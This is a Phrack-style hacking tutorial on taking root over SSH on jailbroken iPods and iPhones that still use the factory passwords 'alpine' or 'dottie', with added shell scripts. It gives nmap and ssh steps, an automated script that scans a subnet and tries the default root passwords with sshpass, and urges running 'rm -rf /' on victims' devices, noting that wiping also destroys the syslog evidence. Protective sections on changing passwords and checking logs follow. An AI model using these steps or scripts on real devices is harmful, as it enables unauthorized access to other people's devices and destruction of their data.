Decided to give this a Phrack-ish type layout because I think I'm addicted to Phrack :P. Anyway, let's begin.
[center]|=-----------------------------------------------------------------------=|
|=--------=[ Exploiting jailbroken iPods / iPhones via SSH ]=--------=|
|=-----------------------------------------------------------------------=|
|=---------------=[ By: Chroniccommand ]=--------------=|
|=---------------=[ CodeShock.org ]=--------------=|
|=---------------=[ ]=--------------=|
|=---------------=[ chroniccommand@gmail.com ]=--------------=|
|=-----------------------------------------------------------------------=|[/center]
---[ Contents
1 - Introduction
2 - How it works
  2.1 - What else you can do
3 - The exploit
  3.1 - From a computer
  3.2 - From your mobile device
4 - Protecting yourself
5 - Conclusion
--[ 1 - Introduction
This paper is a short tutorial on exploiting jailbroken iPod touches and iPhones over SSH. The exploit itself is trivial; the hard part is finding vulnerable victims. The victim has to have jailbroken the device, installed OpenSSH from the package manager, and left the factory root password in place. Roughly 70% of iPod touch / iPhone owners are said to have jailbroken their device (an unsourced estimate, but jailbroken devices are common), so the pool of candidates is not small.
--[ 2 - How it works
Let me first break down the basics. When users jailbreak their device they get options a stock device doesn't offer: themes, free apps, and so on. They also open the device up to new vulnerabilities. For this one the user must have installed some packages from a jailbroken package manager such as Cydia or Icy. A fresh jailbreak with Cydia pulls in a few packages for you, such as core-utils, but the package that matters here is OpenSSH, which the user has to add himself.

A jailbroken device gives you a root account, and Apple, cleverly, ships every device with the same root password. The hashes sit in /etc/master.passwd and were cracked by the iPhone dev-team: on iPhone OS 1.0 the root password was 'dottie', and from firmware 1.0.1 onward it has been 'alpine'. The second built-in account, 'mobile', which the phone's own apps run as, uses 'alpine' as well. If the owner was smart enough to change the password you may have no way in; this exploit depends entirely on the owner's laziness. So the owner must have SSH running and still have the default password set. All we must do is ssh in as root, and from there we have complete control. This can be performed from a computer or from your own device; to do it from a mobile device you need MobileTerminal installed from your package manager (Cydia or Icy), which is covered in section 3.2.

If the owner is smart enough he can check his syslog (if it is installed) to see who accessed the device and from what IP. That won't matter if we wipe the device, since there is no syslog left to read. syslog is installed through the package manager and toggled through a package called SBSettings, which is activated by a swipe at the top of the screen; from there the owner can toggle syslog and see its path.
By default the syslog path is '/var/log/syslog'. syslog is always a good thing to have on your device in case it is ever intruded on. But back to the exploit: on to the next section.
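Reading that syslog by hand is tedious once sshd has been chattering for a while. The script below is an added example (not code from the original post) that pulls the sshd authentication lines out of a syslog, lists which addresses got a root shell, and counts failed attempts per source, which is what a default-password guess looks like from the victim's side. The log lines are constructed in the standard OpenSSH log format; the hostname and addresses are made up.

```shell
#!/bin/sh
# Added example, not part of the original post: summarise sshd
# authentication events from an iPhone/iPod syslog so the owner can see
# who logged in as root and from where. The log lines below are
# constructed in the standard OpenSSH format; the hostname is made up.
SAMPLE_SYSLOG='Feb 14 21:03:11 iPod-touch sshd[412]: Failed password for root from 192.168.1.20 port 50211 ssh2
Feb 14 21:03:14 iPod-touch sshd[412]: Failed password for root from 192.168.1.20 port 50211 ssh2
Feb 14 21:03:17 iPod-touch sshd[412]: Accepted password for root from 192.168.1.20 port 50211 ssh2
Feb 14 21:05:40 iPod-touch sshd[419]: Failed password for invalid user admin from 192.168.1.33 port 40122 ssh2
Feb 14 21:10:02 iPod-touch sshd[430]: Accepted publickey for mobile from 192.168.1.2 port 50300 ssh2
Feb 14 21:11:00 iPod-touch SpringBoard[27]: Received memory warning.'

# ssh_auth_events: read syslog on stdin, print "RESULT USER SOURCE_IP" for
# every sshd Accepted/Failed line, including "invalid user" failures.
ssh_auth_events() {
    awk '/ sshd\[[0-9]+\]: (Accepted|Failed) [a-z]+ for / {
        result = ""; user = ""; ip = ""
        for (i = 1; i <= NF; i++) {
            if ($i == "Accepted" || $i == "Failed") result = $i
            if ($i == "for") {
                if ($(i + 1) == "invalid") { user = $(i + 3); ip = $(i + 5) }
                else                       { user = $(i + 1); ip = $(i + 3) }
            }
        }
        print result, user, ip
    }'
}

# root_logins_by_source: successful root logins, one source address per line.
root_logins_by_source() {
    ssh_auth_events | awk '$1 == "Accepted" && $2 == "root" { print $3 }' | sort -u
}

# failed_logins_by_source: "COUNT SOURCE_IP" for failed attempts, busiest
# first; repeated failures from one address followed by a success is the
# signature of someone trying the factory passwords.
failed_logins_by_source() {
    ssh_auth_events | awk '$1 == "Failed" { n[$3]++ } END { for (ip in n) print n[ip], ip }' | sort -rn
}

# On the device the log is /var/log/syslog once the syslogd package is
# installed; this demo reads the constructed sample instead.
printf '%s\n' "$SAMPLE_SYSLOG" | root_logins_by_source
```

On a real device replace the printf with `root_logins_by_source < /var/log/syslog`. Note that the attacker who wipes the device also wipes this file, so it only helps the owner who looks at it while the device is still alive.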
----[ 2.1 - What else you can do
Once you have performed the exploit and have root access you have complete control over the device: change the wallpaper, read the owner's files, rm -rf /, or even reach a computer the device is plugged into. iTunes talks to the device through the 'MobileDevice Library'; the code, along with more information on the library, is provided here: http://theiphonewiki.com/wiki/index.php ... ce_Library There is a way to worm your way from the exploited device into the computer it syncs with and gain some access there, but that is a hard technique and will not be explained here. Having root means you can do anything you want. So go crazy and fuck that device up.
--[ 3 - The exploit
In this section I will finally explain how to perform the exploit you've been reading about. Say there is an iPod connected to your network, it has SSH open, and the default password is still set. How do you get in? It's quite simple. First, from a computer.
----[ 3.1 - From a computer
This subsection covers performing it from a computer. In this guide I am using Linux with nmap and an SSH client installed: nmap for the port scan to see whether SSH is open, ssh to log into the target. Let's begin.

First I scan my network (router at 192.168.1.1) like so: 'nmap -sS 192.168.1.1/24'. You must be root to run a SYN scan; adding '-p 22' keeps it quick, since port 22 is all we care about. I get a couple of computers on my network and one iPod touch (192.168.1.4). Now scan the iPod touch itself: 'nmap -sS 192.168.1.4'. The result should list port 22 (SSH) as open. If it is, you may be in luck.

Now for the second part. With my terminal still open, ssh to root on the device: 'ssh root@192.168.1.4'. On the first connection ssh asks you to accept the host key fingerprint; type yes. Then it asks for a password. Try 'alpine' first (it is almost always 'alpine'), then 'dottie'. I wait a second as it connects, anxiously watching for a root shell. Success! I get

iPod-touch:~ root#

which means we have root over SSH. Now we could wreck them with 'rm -rf /'. After that the iPod won't boot on its own and whatever was on it is gone. It can still be brought back with a DFU-mode restore through iTunes, which reflashes the firmware and wipes the device, so the owner will not literally need a new iPod, but rm -rf / is still very mean. We can also just turn it off to scare the owner by typing 'halt'. You should see the connection drop, which means the device shut down. Congratulations! You just exploited an iPod touch via SSH.
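The manual steps above (scan the subnet, pick out hosts with port 22 open, try the two factory passwords) script easily. The following is an added example, not code from the original post: it parses nmap's grepable output (-oG) for hosts reporting 22/open and then tries root:alpine and root:dottie against each with sshpass. The scan output embedded below is constructed; real nmap separates the fields with tabs, which awk treats the same as spaces. The filename scan.sh in the usage comment is hypothetical.

```shell
#!/bin/sh
# Added example, not part of the original post: the section's manual
# steps as a script. nmap's grepable output (-oG) is parsed for hosts with
# TCP/22 open, then the two factory root passwords are tried with sshpass.
# The scan output below is constructed; real nmap separates the fields
# with tabs, which awk treats like spaces.
SAMPLE_SCAN='# Nmap 5.00 scan initiated (constructed sample)
Host: 192.168.1.1 ()   Ports: 22/closed/tcp//ssh///
Host: 192.168.1.4 ()   Ports: 22/open/tcp//ssh//OpenSSH 5.1 (protocol 2.0)/
Host: 192.168.1.7 ()   Ports: 22/filtered/tcp//ssh///
Host: 192.168.1.9 ()   Ports: 22/open/tcp//ssh//Dropbear sshd/
# Nmap done'

# ssh_open_hosts: grepable nmap output on stdin -> one IP per line for
# every host whose port 22 is reported open (closed/filtered are skipped).
ssh_open_hosts() {
    awk '/^Host:/ && /22\/open\/tcp/ { print $2 }'
}

# try_default_logins IP...: try root:alpine then root:dottie on each host.
# Needs sshpass. Skips the host-key prompt, allows one password prompt per
# try and uses a short connect timeout so the loop cannot hang on a host
# that answers the SYN scan but never finishes the SSH handshake.
try_default_logins() {
    for ip in "$@"; do
        for pw in alpine dottie; do
            if sshpass -p "$pw" ssh -o ConnectTimeout=5 \
                   -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null \
                   -o NumberOfPasswordPrompts=1 "root@$ip" 'uname -a' >/dev/null 2>&1
            then
                echo "$ip root:$pw"
                break
            fi
        done
    done
}

# Usage (hypothetical filename): run as root, since -sS is a SYN scan,
# against your own subnet:
#   sh scan.sh 192.168.1.0/24
if [ "$#" -gt 0 ]; then
    hosts=$(nmap -sS -p 22 -oG - "$@" | ssh_open_hosts)
    try_default_logins $hosts
fi
```

`$hosts` is deliberately left unquoted so the shell splits it into one argument per address. Only hosts the scan reports as open are touched; anything filtered by a firewall is left alone rather than retried.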
----[ 3.2 - From your mobile device
Now we will do it from your mobile device. First install MobileTerminal and nmap from your package manager. MobileTerminal is exactly what it sounds like: a Unix-style terminal, with the same commands, on your device. Then perform the same steps as above in MobileTerminal. It's as simple as that. I would add that you can download the app 'Snap' from the App Store: Snap is a network scanner combined with a port scanner. I prefer it to nmap on a mobile device, but it's your call which you use.
--[ 4 - Protecting yourself
Now, after reading this, if you own a jailbroken iPod or iPhone you may want to protect yourself. It's easy. Open MobileTerminal, type 'su', and give your default root password (depending on firmware). As root, type 'passwd'. This changes the root password: pick something nobody would guess so you don't get fucked over, and type it again when asked. Then do the same for the second built-in account with 'passwd mobile', since 'mobile' ships with the same default 'alpine' and anyone who logs in as mobile can read everything under /var/mobile. If you never actually use SSH on the device, the safest option is to uninstall OpenSSH entirely. You are now protected from this attack.
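To check whether a device is still at the factory default without guessing, look at the hash field in /etc/master.passwd: on stock firmware both root and mobile carry the same DES crypt of 'alpine'. The script below is an added example, not code from the original post. The hash string is the published stock master.passwd entry for 'alpine'; the file contents embedded here are a constructed sample in the same format, and the fix routine simply runs passwd for each account the check flags.

```shell
#!/bin/sh
# Added example, not part of the original post: run on the device to see
# whether any account still carries the factory password hash. On the
# stock firmware both root and mobile use the same DES crypt of 'alpine'
# in /etc/master.passwd; the hash string below is that published entry,
# and the file contents are a constructed sample of the same format.
DEFAULT_ALPINE_HASH='/smx7MYTQIi2M'

SAMPLE_MASTER_PASSWD='root:/smx7MYTQIi2M:0:0::0:0:System Administrator:/var/root:/bin/sh
mobile:/smx7MYTQIi2M:501:501::0:0:Mobile User:/var/mobile:/bin/sh
_sshd:*:75:75::0:0:sshd Privilege separation:/var/empty:/usr/bin/false'

# accounts_with_default_password: master.passwd on stdin -> names whose
# hash field is exactly the factory hash. A password re-set to 'alpine'
# under a different salt would not match; the untouched stock entry is
# what this check is for.
accounts_with_default_password() {
    awk -F: -v h="$DEFAULT_ALPINE_HASH" '$2 == h { print $1 }'
}

# fix_default_passwords: prompt for a new password for each flagged
# account. Run as root on the device (su first, as the section says).
fix_default_passwords() {
    for u in $(accounts_with_default_password < /etc/master.passwd); do
        echo "$u still has the factory password; setting a new one"
        passwd "$u"
    done
}

# Demo on the constructed sample. The real check is:
#   accounts_with_default_password < /etc/master.passwd
printf '%s\n' "$SAMPLE_MASTER_PASSWD" | accounts_with_default_password
```

An empty result means neither built-in account is at the default any more. Accounts with '*' in the hash field, like _sshd above, have no password at all and are never flagged.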
--[ 5 - Conclusion
I wrote this guide to inform and protect anybody with a mobile device. This exploit has been around since SSH was ported to the iPod touch / iPhone. The exploit is simple and fun to perform. I hope to code a simple backdoor somewhere in the near future and see how it works out. Keep your eyes open for it.